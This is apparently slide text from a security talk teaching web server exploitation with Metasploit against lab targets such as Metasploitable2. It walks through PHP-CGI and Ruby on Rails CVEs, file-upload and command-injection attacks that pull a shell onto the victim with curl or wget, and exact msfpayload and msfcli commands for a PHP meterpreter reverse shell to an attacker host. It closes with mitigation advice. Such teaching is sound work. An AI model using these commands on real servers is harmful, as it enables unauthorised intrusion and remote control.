1. Dennis Maldonado @DennisMald

2.  Application Security Specialist  WhiteHat Security  Full-Time Student  University of Houston – Main Campus ▪ Computer Information Systems Major  Twitter  @DennisMald  Website / Blog  KernelMeltdown.org

3.  Kali Linux – Our attacker machine  Metasploit Framework – Used for exploiting, generating the payload, and establishing a session with our victim.  Metasploitable2 – Victim Web Server

4. Exploiting the backend server through a web application.

5.  Reasons why hackers want to compromise the server:  Run attacks against the internal network  Use the server as a bot  Install backdoors onto the server  Reveal sensitive files/passwords  Execute any local file  Execute remote files  and more…

6.  Vulnerabilities that are dangerous against a server  Directory Traversal  Local File Inclusion  Remote File Inclusion  Remote Code Execution  SQL Injection  Command Injection

7. http://website.com/?page=index.php

10. http://website.com/

11. http://website.com/user.php?id=1&Submit=Submit#

14.  Metasploit is an open-source framework used for Security development and testing  Information gathering and fingerprinting  Exploitation/Penetration testing  Payload generation and encoding  Fuzzing  And much more…

15.  Command Line Interfaces  msfconsole  msfcli  GUI Interfaces  Metasploit Community Edition  Armitage

16.  Modules  Exploit – Exploitation/Proof-of-Concept code ▪ Ruby on Rails exploit ▪ PHP-CGI exploit  Auxiliary – Misc. modules for multiple purposes ▪ Scanners ▪ DDOS tools ▪ Fingerprinting ▪ Clients  Payloads – Code to be executed on the exploited system ▪ System Shells ▪ Meterpreter Shells  Post – Modules for post-exploitation tasks ▪ Persistence ▪ Password Stealing ▪ Pivoting

17.  Active Exploits  Actively exploit a host.  Ex: Ruby on Rails XML exploit  Passive Exploits  Wait’s for incoming hosts, then exploits them  Ex: Java 0-days  Exploits contain payloads

18.  Inline (Non Staged)  Payload containing the exploit and shell code  Stable  Large size  Staged  Exploits victim, establishes connection with attacker, pulls down the payload  Meterpreter  Advanced, dynamic payload.  Extended over the network  Extensible through modules and plugins

19.  Types of connections  Bind ▪ Local server gets started on victim machine ▪ Attacker connects to victim ▪ windows/x64/shell/bind_tcp  Reverse ▪ Local server gets started on attacker machine ▪ Victim connects to attacker ▪ windows/x64/shell/reverse_tcp

21.  CVE 2012-1823  DOS attack ▪ -T 10000  Source code disclosure ▪ -s argument  Remote Code Execution ▪ -d argument

22.  CVE-2013-0156  Easy to find, easy to exploit, critical vulnerability.  Requires just one POST request containing a specially crafted XML data.  Send commands through YAML objects

23.  The upload functionality allows for any file type to be uploaded 1. Upload server-side code and check if it executes ▪ PHP = ▪ ASP = ▪ JSP = 2. Use msfpayload to create a shell 3. Use msfcli to listen for a connection from the victim 4. Upload the shell and execute it

24.  Allows an attacker to execute system level commands. 1. Attempt a safe command 1.echo test 2.uname -a 2. Use msfpayload to create a shell 3. Use msfcli to listen for a connection from the victim 4. Inject curl or wget commands to download the shell onto the victim machine. 5. Chmod if necessary and execute

25.  msfpayload php/meterpreter/reverse_tcp O  msfpayload php/meterpreter/reverse_tcp LHOST=10.211.55.3 LPORT=1337 O  msfpayload php/meterpreter/reverse_tcp LHOST=10.211.55.3 LPORT=1337 R > shell.php  # Now edit the shell.php file to remove the comment on the first line and add "?>" at the end of the file.  ==================================  msfcli multi/handler payload=php/meterpreter/reverse_tcp lhost=10.211.55.3 lport=1337 E

27.  Keep software up to date!  PHP: 5.4.3, 5.3.13  Ruby on Rails: 3.2.11, 3.1.10, 3.0.19, 2.3.15  Use whitelisting for file upload extensions  Watch for extensions and content-types  Don’t let upload directory be executable  Rename files if possible  Don’t pass user input as a system command!  Use library calls when possible  Sanitize input

29.  BackTrack-Linux  http://www.kali.org/ http://www.kali.org/  The Metasploit Project  http://www.metasploit.com/ http://www.metasploit.com/  Metasploit Unleashed  http://www.offensive-security.com/metasploit-unleashed/ http://www.offensive-security.com/metasploit-unleashed/  PHP-CGI Advisory  http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/ http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/  Ruby on Rails Exploitation  https://community.rapid7.com/community/metasploit/blog/2013/01/10/exploiting-ruby-on-rails-with- metasploit-cve-2013-0156 https://community.rapid7.com/community/metasploit/blog/2013/01/10/exploiting-ruby-on-rails-with- metasploit-cve-2013-0156  Damn Vulnerable Web Application (DVWA)  http://www.dvwa.co.uk/ http://www.dvwa.co.uk/  Metasploitable 2  http://information.rapid7.com/download-metasploitable.html?LS=1631875&CS=web http://information.rapid7.com/download-metasploitable.html?LS=1631875&CS=web